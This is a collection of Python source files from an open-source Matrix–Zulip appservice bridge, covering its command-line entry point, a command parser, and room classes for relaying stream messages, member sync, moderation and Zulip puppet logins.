# check again if we're still valid
if not room.is_valid():
logging.debug(
f"Room {room.id} failed validation after post init, leaving."
)
self.unregister_room(room.id)
if unsafe_mode:
await self.leave_room(room.id, room.members)
continue
# connect organization rooms one by one, this may take a while
if isinstance(room, OrganizationRoom) and not room.connected:
def sync_connect(room):
asyncio.ensure_future(room.connect())
asyncio.get_running_loop().call_later(wait, sync_connect, room)
wait += 1
logging.info(
f"Init done with {wait-1} organizations connecting, bridge is now running!"
)
await self.push_bridge_state(BridgeStateEvent.UNCONFIGURED)
# late start WS to avoid getting transactions too early
if ws:
await ws.start()
if self.config["owner"] and not owner_control_open:
logging.info(f"Opening control room for owner {self.config['owner']}")
try:
room_id = await self.az.intent.create_room(
invitees=[self.config["owner"]],
custom_request_fields={"com.beeper.auto_join_invites": True},
)
room = ControlRoom(
id=room_id,
user_id=self.config["owner"],
serv=self,
members=[self.config["owner"]],
bans=[],
)
await room.save()
self.register_room(room)
await self.az.intent.join_room(room.id)
# show help on open
await room.show_help()
except Exception:
logging.error("Failed to create control room, huh")
await asyncio.Event().wait()
async def async_main():
parser = argparse.ArgumentParser(
prog=os.path.basename(sys.executable) + " -m " + __package__,
description=f"A puppeting Matrix - Zulip appservice bridge (v{__version__})",
formatter_class=argparse.ArgumentDefaultsHelpFormatter,
)
parser.add_argument(
"-v",
"--verbose",
help="log debug messages",
action="store_true",
default=argparse.SUPPRESS,
)
req = parser.add_mutually_exclusive_group(required=True)
req.add_argument(
"-c",
"--config",
help="registration YAML file path, must be writable if generating",
)
req.add_argument(
"--version",
action="store_true",
help="show bridge version",
default=argparse.SUPPRESS,
)
parser.add_argument(
"-l",
"--listen-address",
help="bridge listen address (default: as specified in url in config, 127.0.0.1 otherwise)",
)
parser.add_argument(
"-p",
"--listen-port",
help="bridge listen port (default: as specified in url in config, 28464 otherwise)",
type=int,
)
parser.add_argument("-u", "--uid", help="user id to run as", default=None)
parser.add_argument("-g", "--gid", help="group id to run as", default=None)
parser.add_argument(
"--generate",
action="store_true",
help="generate registration YAML for Matrix homeserver (Synapse)",
default=argparse.SUPPRESS,
)
parser.add_argument(
"--generate-compat",
action="store_true",
help="generate registration YAML for Matrix homeserver (Dendrite and Conduit)",
default=argparse.SUPPRESS,
)
parser.add_argument(
"--reset",
action="store_true",
help="reset ALL bridge configuration from homeserver and exit",
default=argparse.SUPPRESS,
)
parser.add_argument(
"--unsafe-mode",
action="store_true",
help="allow appservice to leave rooms on error",
)
parser.add_argument(
"-o",
"--owner",
help="set owner MXID (eg: @user:homeserver) or first talking local user will claim the bridge",
default=None,
)
parser.add_argument(
"homeserver",
nargs="?",
help="URL of Matrix homeserver",
default="http://localhost:8008",
)
args = parser.parse_args()
logging_level = logging.INFO
if "verbose" in args:
logging_level = logging.DEBUG
logging.basicConfig(stream=sys.stdout, level=logging_level)
try:
coloredlogs.install(logging_level)
except NameError:
pass
if "generate" in args or "generate_compat" in args:
letters = string.ascii_letters + string.digits
registration = {
"id": "zulipbridge",
"url": f"http://{args.listen_address or '127.0.0.1'}:{args.listen_port or 28464}",
"as_token": "".join(random.choice(letters) for i in range(64)),
"hs_token": "".join(random.choice(letters) for i in range(64)),
"rate_limited": False,
"sender_localpart": "zulipbridge",
"namespaces": {
"users": [{"regex": "@zulip_.*", "exclusive": True}],
"aliases": [],
"rooms": [],
},
}
if "generate_compat" in args:
registration["namespaces"]["users"].append(
{"regex": "@zulipbridge:.*", "exclusive": True}
)
if os.path.isfile(args.config):
logging.critical("Registration file already exists, not overwriting.")
sys.exit(1)
if args.config == "-":
yaml.dump(registration, sys.stdout)
else:
with open(args.config, "w", encoding="utf-8") as f:
yaml.dump(registration, f)
logging.info(f"Registration file generated and saved to {args.config}")
elif "reset" in args:
service = BridgeAppService()
logging.warning("Resetting will delete all bridge data, this is irreversible!")
await asyncio.sleep(3) # Gotta be careful
if input("Are you SURE you want to continue? [y/n] ").lower() == "y":
await service.reset(args.config, args.homeserver)
else:
logging.info("Not doing anything.")
sys.exit(0)
elif "version" in args:
logging.info(__version__)
else:
service = BridgeAppService()
service.load_reg(args.config)
if os.getuid() == 0:
if args.gid:
gid = grp.getgrnam(args.gid).gr_gid
os.setgid(gid)
os.setgroups([])
if args.uid:
uid = pwd.getpwnam(args.uid).pw_uid
os.setuid(uid)
os.umask(0o077)
listen_address = args.listen_address
listen_port = args.listen_port
if not listen_address:
listen_address = "127.0.0.1"
try:
url = urllib.parse.urlparse(service.registration["url"])
if url.hostname:
listen_address = url.hostname
except Exception:
pass
if not listen_port:
listen_port = 28464
try:
url = urllib.parse.urlparse(service.registration["url"])
if url.port:
listen_port = url.port
except Exception:
pass
await service.run(
listen_address, listen_port, args.homeserver, args.owner, args.unsafe_mode
)
def main():
asyncio.run(async_main())
if __name__ == "__main__":
try:
main()
except KeyboardInterrupt:
pass
| 35,705 | Python | .py | 868 | 29.428571 | 134 | 0.568976 | GearKite/MatrixZulipBridge | 8 | 1 | 3 | AGPL-3.0 | 9/5/2024, 10:48:09 PM (Europe/Amsterdam) |
2,286,580 | command_parse.py | GearKite_MatrixZulipBridge/matrixzulipbridge/command_parse.py | # MatrixZulipBridge - an appservice puppeting bridge for Matrix - Zulip
#
# Copyright (C) 2024 Emma Meijere <[email protected]>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
#
# Originally licensed under the MIT (Expat) license:
# <https://github.com/hifi/heisenbridge/blob/2532905f13835762870de55ba8a404fad6d62d81/LICENSE>.
#
# [This file includes modifications made by Emma Meijere]
#
#
import argparse
import shlex
from typing import Awaitable
class CommandParserFormatter(
argparse.ArgumentDefaultsHelpFormatter, argparse.RawTextHelpFormatter
):
pass
class CommandParserError(Exception):
pass
class CommandParser(argparse.ArgumentParser):
def __init__(self, *args, formatter_class=CommandParserFormatter, **kwargs):
super().__init__(*args, formatter_class=formatter_class, **kwargs)
@property
def short_description(self):
return self.description.split("\n")[0]
def error(self, message):
raise CommandParserError(message)
def print_usage(self, *args, **kwargs):
raise CommandParserError(self.format_usage())
def print_help(self, *args, **kwargs):
raise CommandParserError(self.format_help())
def exit(self, status=0, message=None):
pass
def split(text):
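    """Split shell-style input into argument lists, one per ';'-separated command."""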
commands = []
sh_split = shlex.shlex(text, posix=True, punctuation_chars=";")
sh_split.commenters = ""
sh_split.wordchars += "!#$%&()*+,-./:<=>?@[\\]^_`{|}~"
args = []
for v in list(sh_split):
if v == ";":
commands.append(args)
args = []
else:
args.append(v)
if len(args) > 0:
commands.append(args)
return commands
class CommandManager:
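    """Registry that parses and dispatches bridge commands to their handlers."""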
_commands: dict[str, tuple[CommandParser, Awaitable]]
def __init__(self):
self._commands = {}
def register(self, cmd: CommandParser, func, aliases=None):
self._commands[cmd.prog] = (cmd, func)
if aliases is not None:
for alias in aliases:
self._commands[alias] = (cmd, func)
async def trigger_args(self, args, tail=None, allowed=None, forward=None):
command = args.pop(0).upper()
if allowed is not None and command not in allowed:
raise CommandParserError(f"Illegal command supplied: '{command}'")
if command in self._commands:
(cmd, func) = self._commands[command]
cmd_args = cmd.parse_args(args)
cmd_args._tail = tail
cmd_args._forward = forward
await func(cmd_args)
elif command == "HELP":
out = ["Following commands are supported:", ""]
for name, (cmd, func) in self._commands.items():
if cmd.prog == name:
out.append("\t{} - {}".format(cmd.prog, cmd.short_description))
out.append("")
out.append("To get more help, add -h to any command without arguments.")
raise CommandParserError("\n".join(out))
else:
raise CommandParserError(
'Unknown command "{}", type HELP for list'.format(command)
)
async def trigger(self, text, tail=None, allowed=None, forward=None):
for args in split(text):
await self.trigger_args(args, tail, allowed, forward)
tail = None
| 3,920 | Python | .py | 96 | 34 | 95 | 0.656217 | GearKite/MatrixZulipBridge | 8 | 1 | 3 | AGPL-3.0 | 9/5/2024, 10:48:09 PM (Europe/Amsterdam) |
2,286,581 | stream_room.py | GearKite_MatrixZulipBridge/matrixzulipbridge/stream_room.py | # MatrixZulipBridge - an appservice puppeting bridge for Matrix - Zulip
#
# Copyright (C) 2024 Emma Meijere <[email protected]>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
#
# Originally licensed under the MIT (Expat) license:
# <https://github.com/hifi/heisenbridge/blob/2532905f13835762870de55ba8a404fad6d62d81/LICENSE>.
#
# [This file includes modifications made by Emma Meijere]
#
#
import asyncio
import logging
from typing import TYPE_CHECKING, Optional
from mautrix.errors import MBadState
from mautrix.types import MessageType
from matrixzulipbridge.command_parse import CommandParser
from matrixzulipbridge.direct_room import DirectRoom
from matrixzulipbridge.room import InvalidConfigError
from matrixzulipbridge.under_organization_room import connected
if TYPE_CHECKING:
from mautrix.types import Event, MessageEvent, RoomID, UserID
from matrixzulipbridge.organization_room import OrganizationRoom
from matrixzulipbridge.types import ZulipStreamID, ZulipUserID
class StreamRoom(DirectRoom):
"""Puppeting room for Zulip stream."""
key: Optional[str]
member_sync: str
names_buffer: list[str]
use_displaynames = True
allow_notice = False
topic_sync = None
stream_id: "ZulipStreamID"
stream_name: Optional[str]
def init(self) -> None:
super().init()
self.key = None
self.autocmd = None
self.stream_id = None
self.stream_name = None
        # for migration purposes the class default is full member sync
self.member_sync = "full"
cmd = CommandParser(
prog="SYNC",
description="override Zulip member sync type for this room",
epilog="Note: To force full sync after setting to full, use the NAMES command",
)
group = cmd.add_mutually_exclusive_group()
group.add_argument(
"--lazy",
help="set lazy sync, members are added when they talk",
action="store_true",
)
group.add_argument(
"--half",
help="set half sync, members are added when they join or talk",
action="store_true",
)
group.add_argument(
"--full",
help="set full sync, members are fully synchronized",
action="store_true",
)
group.add_argument(
"--off",
help="disable member sync completely, the bridge will relay all messages, may be useful during spam attacks",
action="store_true",
)
self.commands.register(cmd, self.cmd_sync)
cmd = CommandParser(
prog="UPGRADE",
description="Perform any potential bridge-side upgrades of the room",
)
cmd.add_argument(
"--undo", action="store_true", help="undo previously performed upgrade"
)
self.commands.register(cmd, self.cmd_upgrade)
cmd = CommandParser(
prog="DISPLAYNAMES",
description="enable or disable use of displaynames in relayed messages",
)
cmd.add_argument(
"--enable", dest="enabled", action="store_true", help="Enable displaynames"
)
cmd.add_argument(
"--disable",
dest="enabled",
action="store_false",
help="Disable displaynames (fallback to MXID)",
)
cmd.set_defaults(enabled=None)
self.commands.register(cmd, self.cmd_displaynames)
cmd = CommandParser(
prog="NOTICERELAY",
description="enable or disable relaying of Matrix notices to Zulip",
)
cmd.add_argument(
"--enable", dest="enabled", action="store_true", help="Enable notice relay"
)
cmd.add_argument(
"--disable",
dest="enabled",
action="store_false",
help="Disable notice relay",
)
cmd.set_defaults(enabled=None)
self.commands.register(cmd, self.cmd_noticerelay)
cmd = CommandParser(
prog="TOPIC",
description="show or set channel topic and configure sync mode",
)
cmd.add_argument(
"--sync",
choices=["off", "zulip", "matrix", "any"],
help="Topic sync targets, defaults to off",
)
cmd.add_argument("text", nargs="*", help="topic text if setting")
self.commands.register(cmd, self.cmd_topic)
self.mx_register("m.room.topic", self._on_mx_room_topic)
def is_valid(self) -> bool:
# we are valid as long as the appservice is in the room
if not self.in_room(self.serv.user_id):
return False
return True
@staticmethod
async def create(
organization: "OrganizationRoom",
name: str,
backfill: int = None,
room_id: "RoomID" = None,
) -> "StreamRoom":
logging.debug(
f"StreamRoom.create(organization='{organization.name}', name='{name}'"
)
organization.send_notice("Initializing room...")
room = StreamRoom(
None,
organization.user_id,
organization.serv,
[organization.user_id, organization.serv.user_id],
[],
)
room.name = name.lower()
room.organization = organization
room.organization_id = organization.id
room.max_backfill_amount = backfill or organization.max_backfill_amount
result = organization.zulip.get_stream_id(name)
room.stream_id = result.get("stream_id")
if not room.stream_id:
organization.send_notice(
f"A stream with the name {name} doesn't exist or we haven't been invited to it."
)
return None
room.organization = organization
room.organization_id = organization.id
# stamp global member sync setting at room creation time
room.member_sync = organization.serv.config["member_sync"]
organization.serv.register_room(room)
organization.rooms[room.stream_id] = room
if room_id is not None:
asyncio.ensure_future(room.join_existing_room(room_id))
else:
asyncio.ensure_future(room.create_mx(name))
return room
def from_config(self, config: dict) -> None:
super().from_config(config)
if "key" in config:
self.key = config["key"]
if "member_sync" in config:
self.member_sync = config["member_sync"]
if "stream_id" in config:
self.stream_id = config["stream_id"]
if self.stream_id is None:
raise InvalidConfigError("No stream_id key in config for ChannelRoom")
# initialize lazy members dict if sync is not off
if self.member_sync != "off":
if self.lazy_members is None:
self.lazy_members = {}
else:
self.lazy_members = None
if "use_displaynames" in config:
self.use_displaynames = config["use_displaynames"]
if "allow_notice" in config:
self.allow_notice = config["allow_notice"]
if "topic_sync" in config:
self.topic_sync = config["topic_sync"]
def to_config(self) -> dict:
return {
**(super().to_config()),
"key": self.key,
"member_sync": self.member_sync,
"stream_id": self.stream_id,
"use_displaynames": self.use_displaynames,
"allow_notice": self.allow_notice,
"topic_sync": self.topic_sync,
}
async def create_mx(self, name: str):
# handle !room names properly
visible_name = name
if visible_name.startswith("!"):
visible_name = "!" + visible_name[6:]
result = self.organization.zulip.call_endpoint(
url=f"/streams/{self.stream_id}", method="get"
)
if result["result"] != "success":
self.send_notice(f"Could not get stream by id: {result}")
return
restricted = None # Invite only
name_prefix = "🔒"
if not result["stream"]["invite_only"]:
# Allow space members to join
restricted = self.organization.space.id
name_prefix = "#"
self.id = await self.organization.serv.create_room(
f"{name_prefix}{visible_name} ({self.organization.name})",
"",
[self.organization.user_id],
permissions=self.organization.permissions,
restricted=restricted,
)
self.serv.register_room(self)
await self.save()
# start event queue now that we have an id
self._queue.start()
# attach to organization space
if self.organization.space:
await self.organization.space.attach(self.id)
@connected
async def _on_mx_room_topic(self, event: "Event") -> None:
if event.sender != self.serv.user_id and self.topic_sync in ["zulip", "any"]:
# topic = re.sub(r"[\r\n]", " ", event.content.topic)
raise NotImplementedError("Changing Zulip stream description")
@connected
async def on_mx_message(self, event: "MessageEvent") -> None:
sender = str(event.sender)
(name, server) = sender.split(":", 1)
# ignore self messages
if sender == self.serv.user_id:
return
# prevent re-sending federated messages back
if (
name.startswith("@" + self.serv.puppet_prefix)
and server == self.serv.server_name
):
return
sender = f"[{self._get_displayname(sender)}](https://matrix.to/#/{sender})"
if event.content.msgtype.is_media or event.content.msgtype in (
MessageType.EMOTE,
MessageType.TEXT,
MessageType.NOTICE,
):
await self._relay_message(event, sender)
await self.az.intent.send_receipt(event.room_id, event.event_id)
async def _relay_message(self, event: "MessageEvent", sender: str):
prefix = ""
client = self.organization.zulip_puppets.get(event.sender)
if not client:
client = self.organization.zulip
prefix = f"<{sender}> "
# try to find out if this was a reply
reply_to = None
if event.content.get_reply_to():
rel_event = event
# traverse back all edits
while rel_event.content.get_edit():
rel_event = await self.az.intent.get_event(
self.id, rel_event.content.get_edit()
)
# see if the original is a reply
if rel_event.content.get_reply_to():
reply_to = await self.az.intent.get_event(
self.id, rel_event.content.get_reply_to()
)
# Get topic (Matrix thread)
thread_id = event.content.get_thread_parent()
# Ignore messages outside a thread
if thread_id is None:
return
        # Save last thread event for old clients
        self.thread_last_message[thread_id] = event.event_id
        if thread_id in self.threads.inv:
            topic = self.threads.inv[thread_id]
        else:
            thread_event = await self.az.intent.get_event(self.id, thread_id)
            topic = thread_event.content.body
            self.threads[topic] = thread_id
# keep track of the last message
self.last_messages[event.sender] = event
message = await self._process_event_content(
event, prefix, reply_to, topic=topic
)
request = {
"type": "stream",
"to": self.stream_id,
"topic": topic,
"content": message,
}
result = client.send_message(request)
if result["result"] != "success":
logging.error(f"Failed sending message to Zulip: {result['msg']}")
return
self.messages[str(result["id"])] = event.event_id
        await self.save()
@connected
async def on_mx_ban(self, user_id: "UserID") -> None:
if not self.organization.relay_moderation:
return
zulip_user_id = self.organization.get_zulip_user_id_from_mxid(user_id)
if zulip_user_id is None:
return
if zulip_user_id in self.organization.deactivated_users:
return
result = self.organization.zulip.deactivate_user_by_id(zulip_user_id)
if result["result"] != "success":
self.organization.send_notice(
f"Unable to deactivate {user_id}: {result['msg']}"
)
return
self.organization.deactivated_users.add(zulip_user_id)
self.organization.delete_zulip_puppet(user_id)
rooms = list(self.organization.rooms.values()) + list(
self.organization.direct_rooms.values()
)
for room in rooms:
if room == self:
continue
if not isinstance(room, DirectRoom):
continue
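            # exact-type check: only plain DM rooms are filtered by recipient;
            # DirectRoom subclasses fall through and are banned unconditionally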
if type(room) == DirectRoom: # pylint: disable=unidiomatic-typecheck
if zulip_user_id not in room.recipient_ids:
continue
await self.az.intent.ban_user(room.id, user_id, "account deactivated")
@connected
async def on_mx_unban(self, user_id: "UserID") -> None:
if not self.organization.relay_moderation:
return
zulip_user_id = self.organization.get_zulip_user_id_from_mxid(user_id)
if zulip_user_id is None:
return
if zulip_user_id not in self.organization.deactivated_users:
return
result = self.organization.zulip.reactivate_user_by_id(zulip_user_id)
if result["result"] != "success":
self.organization.send_notice(
f"Unable to reactivate {user_id}: {result['msg']}"
)
return
self.organization.deactivated_users.remove(zulip_user_id)
# we don't need to unban puppets
if self.serv.is_puppet(user_id):
return
for room in self.organization.rooms.values():
if not isinstance(room, DirectRoom):
continue
if room == self:
continue
try:
await self.az.intent.unban_user(
room.id, user_id, "unbanned in another room"
)
except MBadState:
pass
@connected
async def on_mx_leave(self, user_id: "UserID") -> None:
pass
async def cmd_displaynames(self, args) -> None:
if args.enabled is not None:
self.use_displaynames = args.enabled
await self.save()
self.send_notice(
f"Displaynames are {'enabled' if self.use_displaynames else 'disabled'}"
)
async def cmd_noticerelay(self, args) -> None:
if args.enabled is not None:
self.allow_notice = args.enabled
await self.save()
self.send_notice(
f"Notice relay is {'enabled' if self.allow_notice else 'disabled'}"
)
async def cmd_topic(self, args) -> None:
if args.sync is None:
self.organization.conn.topic(self.name, " ".join(args.text))
return
self.topic_sync = args.sync if args.sync != "off" else None
self.send_notice(
f"Topic sync is {self.topic_sync if self.topic_sync else 'off'}"
)
await self.save()
async def cmd_sync(self, args):
if args.lazy:
self.member_sync = "lazy"
await self.save()
elif args.half:
self.member_sync = "half"
await self.save()
elif args.full:
self.member_sync = "full"
await self.save()
elif args.off:
self.member_sync = "off"
            # prevent anyone already on the lazy list from being invited
self.lazy_members = None
await self.save()
self.send_notice(
f"Member sync is set to {self.member_sync}", forward=args._forward
)
def _add_puppet(self, zulip_user: dict):
mx_user_id = self.serv.get_mxid_from_zulip_user_id(
self.organization, zulip_user["user_id"]
)
self.ensure_zulip_user_id(self.organization, zulip_user=zulip_user)
self.join(mx_user_id, zulip_user["full_name"])
def _remove_puppet(self, user_id, reason=None):
if user_id == self.serv.user_id or user_id == self.user_id:
return
self.leave(user_id, reason)
def on_join(
self, zulip_user_id: "ZulipUserID" = None, zulip_user: dict = None
) -> None:
if zulip_user_id is None:
zulip_user_id = zulip_user["user_id"]
# we don't need to sync ourself
if zulip_user_id == self.organization.profile["user_id"]:
return
if zulip_user is None:
zulip_user = self.organization.get_zulip_user(zulip_user_id)
# ensure, append, invite and join
self._add_puppet(zulip_user)
mx_user_id = self.serv.get_mxid_from_zulip_user_id(
self.organization, zulip_user_id
)
self.join(mx_user_id, zulip_user["full_name"], lazy=False)
def on_part(self, zulip_user_id: "ZulipUserID") -> None:
# we don't need to sync ourself
if zulip_user_id == self.organization.profile["user_id"]:
return
mx_user_id = self.serv.get_mxid_from_zulip_user_id(
self.organization, zulip_user_id
)
self._remove_puppet(mx_user_id)
async def sync_zulip_members(self, subscribers: list["ZulipUserID"]):
to_remove = []
to_add = []
# always reset lazy list because it can be toggled on-the-fly
self.lazy_members = {} if self.member_sync != "off" else None
# build to_remove list from our own puppets
for member in self.members:
(name, server) = member.split(":", 1)
if (
name.startswith("@" + self.serv.puppet_prefix)
and server == self.serv.server_name
):
to_remove.append(member)
for zulip_user_id in subscribers:
# convert to mx id, check if we already have them
mx_user_id = self.serv.get_mxid_from_zulip_user_id(
self.organization, zulip_user_id
)
# make sure this user is not removed from room
if mx_user_id in to_remove:
to_remove.remove(mx_user_id)
continue
# ignore adding us here, only lazy join on echo allowed
if zulip_user_id == self.organization.profile["user_id"]:
continue
# if this user is not in room, add to invite list
if not self.in_room(mx_user_id):
to_add.append((mx_user_id, zulip_user_id))
# always put everyone in the room to lazy list if we have any member sync
if self.lazy_members is not None:
self.lazy_members[mx_user_id] = zulip_user_id
# never remove us or appservice
if self.serv.user_id in to_remove:
to_remove.remove(self.serv.user_id)
if self.user_id in to_remove:
to_remove.remove(self.user_id)
for mx_user_id, zulip_user_id in to_add:
zulip_user = self.organization.get_zulip_user(zulip_user_id)
self._add_puppet(zulip_user)
for mx_user_id in to_remove:
self._remove_puppet(mx_user_id, "Unsubcribed from stream")
async def backfill_messages(self):
if self.max_backfill_amount == 0:
return
request = {
"anchor": "newest",
"num_before": self.max_backfill_amount,
"num_after": 0,
"narrow": [
{"operator": "stream", "operand": self.stream_id},
],
}
result = self.organization.zulip.get_messages(request)
if result["result"] != "success":
logging.error(f"Failed getting Zulip messages: {result['msg']}")
return
for message in result["messages"]:
if str(message["id"]) in self.messages:
continue
if str(message["id"]) in self.organization.messages:
continue
self.organization.zulip_handler.backfill_message(message)
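# Illustrative sketch (not part of the bridge): backfill_messages() pages
# backwards from the newest message with Zulip's "narrow" filter. Assuming a
# configured zulip.Client, the same request in isolation looks like this
# (the stream id 42 and the zuliprc path are made up):
#
#   import zulip
#
#   client = zulip.Client(config_file="~/zuliprc")
#   result = client.get_messages({
#       "anchor": "newest",
#       "num_before": 50,
#       "num_after": 0,
#       "narrow": [{"operator": "stream", "operand": 42}],
#   })
#   if result["result"] == "success":
#       for message in result["messages"]:
#           print(message["id"], message["subject"])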
| 21,277 | Python | .py | 517 | 30.814313 | 121 | 0.595147 | GearKite/MatrixZulipBridge | 8 | 1 | 3 | AGPL-3.0 | 9/5/2024, 10:48:09 PM (Europe/Amsterdam) |
2,286,582 | personal_room.py | GearKite_MatrixZulipBridge/matrixzulipbridge/personal_room.py | # MatrixZulipBridge - an appservice puppeting bridge for Matrix - Zulip
#
# Copyright (C) 2024 Emma Meijere <[email protected]>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
#
# Originally licensed under the MIT (Expat) license:
# <https://github.com/hifi/heisenbridge/blob/2532905f13835762870de55ba8a404fad6d62d81/LICENSE>.
#
# [This file includes modifications made by Emma Meijere]
#
#
import asyncio
import logging
from typing import TYPE_CHECKING
from matrixzulipbridge import __version__
from matrixzulipbridge.command_parse import (
CommandManager,
CommandParser,
CommandParserError,
)
from matrixzulipbridge.direct_room import DirectRoom
from matrixzulipbridge.under_organization_room import UnderOrganizationRoom
if TYPE_CHECKING:
from mautrix.types import MessageEvent, UserID
from matrixzulipbridge.organization_room import OrganizationRoom
from matrixzulipbridge.types import ZulipUserID
class PersonalRoom(UnderOrganizationRoom):
commands: CommandManager
owner_mxid: "UserID"
owner_zulip_id: "ZulipUserID"
def init(self):
super().init()
self.owner_mxid = None
self.owner_zulip_id = None
self.commands = CommandManager()
cmd = CommandParser(
prog="LOGINZULIP",
description="enable Zulip puppeting and login",
)
cmd.add_argument("email", nargs="?", help="your Zulip account email")
cmd.add_argument("api_key", nargs="?", help="your Zulip account API key")
self.commands.register(cmd, self.cmd_loginzulip)
cmd = CommandParser(
prog="LOGOUTZULIP",
description="disable Zulip puppeting",
)
self.commands.register(cmd, self.cmd_logoutzulip)
cmd = CommandParser(
prog="DM",
description="create a direct message room",
)
cmd.add_argument("user", nargs="+", help="Zulip puppet or Matrix user IDs")
self.commands.register(cmd, self.cmd_dm)
self.mx_register("m.room.message", self.on_mx_message)
@staticmethod
async def create(
organization: "OrganizationRoom", user_mxid: "UserID"
) -> "PersonalRoom":
logging.debug(
f"PersonalRoom.create(organization='{organization.name}', user_mxid='{user_mxid}'"
)
room = PersonalRoom(
None,
user_mxid,
organization.serv,
[user_mxid, organization.serv.user_id],
[],
)
room.organization = organization
room.organization_id = organization.id
room.owner_mxid = user_mxid
organization.serv.register_room(room)
organization.rooms[user_mxid] = room
asyncio.ensure_future(room.create_mx(user_mxid))
return room
def from_config(self, config: dict) -> None:
super().from_config(config)
if "owner_mxid" in config:
self.owner_mxid = config["owner_mxid"]
if "owner_zulip_id" in config:
self.owner_zulip_id = config["owner_zulip_id"]
def to_config(self) -> dict:
return {
**(super().to_config()),
"owner_mxid": self.owner_mxid,
"owner_zulip_id": self.owner_zulip_id,
}
async def create_mx(self, user_mxid: "UserID") -> None:
if self.id is None:
self.id = await self.organization.serv.create_room(
f"{self.organization.name} (Personal room)",
f"Personal room for {self.organization.name}",
[user_mxid],
)
self.serv.register_room(self)
await self.save()
# start event queue now that we have an id
self._queue.start()
# attach to organization space
if self.organization.space:
await self.organization.space.attach(self.id)
def is_valid(self) -> bool:
if self.user_id is None:
return False
if len(self.members) != 2:
return False
if self.owner_mxid is None:
return False
return True
async def show_help(self):
self.send_notice_html(
f"<b>Howdy, stranger!</b> This is your personal room for {self.organization.name}."
)
try:
return await self.commands.trigger("HELP")
except CommandParserError as e:
return self.send_notice(str(e))
async def cmd_loginzulip(self, args):
if not args.email or not args.api_key:
self.send_notice("Specify an email address and API key to login.")
return
self.organization.zulip_puppet_login[self.user_id] = {
"email": args.email,
"api_key": args.api_key,
}
profile = await self.organization.login_zulip_puppet(
self.user_id, args.email, args.api_key
)
self.owner_zulip_id = profile["user_id"]
await self.save()
self.send_notice_html("Enabled Zulip puppeting and logged in")
async def cmd_logoutzulip(self, _args):
try:
del self.organization.zulip_puppet_login[self.user_id]
except KeyError:
self.send_notice("You haven't enabled Zulip puppeting")
return
try:
del self.organization.zulip_puppets[self.user_id]
except KeyError:
pass
self.send_notice("Logged out of Zulip")
async def cmd_dm(self, args):
users: list[str] = args.user
users.append(self.owner_mxid)
recipients = []
for user in users:
user_zulip_id = None
if user in self.organization.zulip_puppet_user_mxid.inverse:
user_zulip_id = self.organization.zulip_puppet_user_mxid.inverse[user]
elif self.serv.is_puppet(user):
user_zulip_id = self.organization.get_zulip_user_id_from_mxid(user)
else:
self.send_notice(f"Can't create DM with {user}")
return
zulip_user = self.organization.get_zulip_user(user_zulip_id)
if zulip_user is None or "user_id" not in zulip_user:
self.send_notice(f"Can't find Zulip user with ID {user_zulip_id}")
return
recipients.append(
{
"id": zulip_user["user_id"],
"full_name": zulip_user["full_name"],
}
)
recipient_ids = frozenset(user["id"] for user in recipients)
room = self.organization.direct_rooms.get(recipient_ids)
if room is not None:
self.send_notice(f"You already have a room with these users at {room.id}")
await room.check_if_nobody_left()
return
room = await DirectRoom.create(self.organization, recipients)
self.send_notice("Created a DM room and invited you to it.")
async def on_mx_message(self, event: "MessageEvent") -> bool:
if str(event.content.msgtype) != "m.text" or event.sender == self.serv.user_id:
return
# ignore edits
if event.content.get_edit():
return
try:
lines = event.content.body.split("\n")
command = lines.pop(0)
tail = "\n".join(lines) if len(lines) > 0 else None
await self.commands.trigger(command, tail)
except CommandParserError as e:
self.send_notice(str(e))
async def cmd_version(self, _args):
self.send_notice(f"zulipbridge v{__version__}")
| 8,171 | Python | .py | 200 | 31.655 | 95 | 0.626151 | GearKite/MatrixZulipBridge | 8 | 1 | 3 | AGPL-3.0 | 9/5/2024, 10:48:09 PM (Europe/Amsterdam) |
2,286,583 | __init__.py | GearKite_MatrixZulipBridge/matrixzulipbridge/__init__.py | # MatrixZulipBridge - an appservice puppeting bridge for Matrix - Zulip
#
# Copyright (C) 2024 Emma Meijere <[email protected]>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
#
# Originally licensed under the MIT (Expat) license:
# <https://github.com/hifi/heisenbridge/blob/2532905f13835762870de55ba8a404fad6d62d81/LICENSE>.
#
# [This file includes modifications made by Emma Meijere]
#
#
"""Pupetting Matrix - Zulip bridge"""
from matrixzulipbridge.version import __version__
| 1,085 | Python | .py | 25 | 42.4 | 95 | 0.785849 | GearKite/MatrixZulipBridge | 8 | 1 | 3 | AGPL-3.0 | 9/5/2024, 10:48:09 PM (Europe/Amsterdam) |
2,286,584 | direct_room.py | GearKite_MatrixZulipBridge/matrixzulipbridge/direct_room.py | # MatrixZulipBridge - an appservice puppeting bridge for Matrix - Zulip
#
# Copyright (C) 2024 Emma Meijere <[email protected]>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
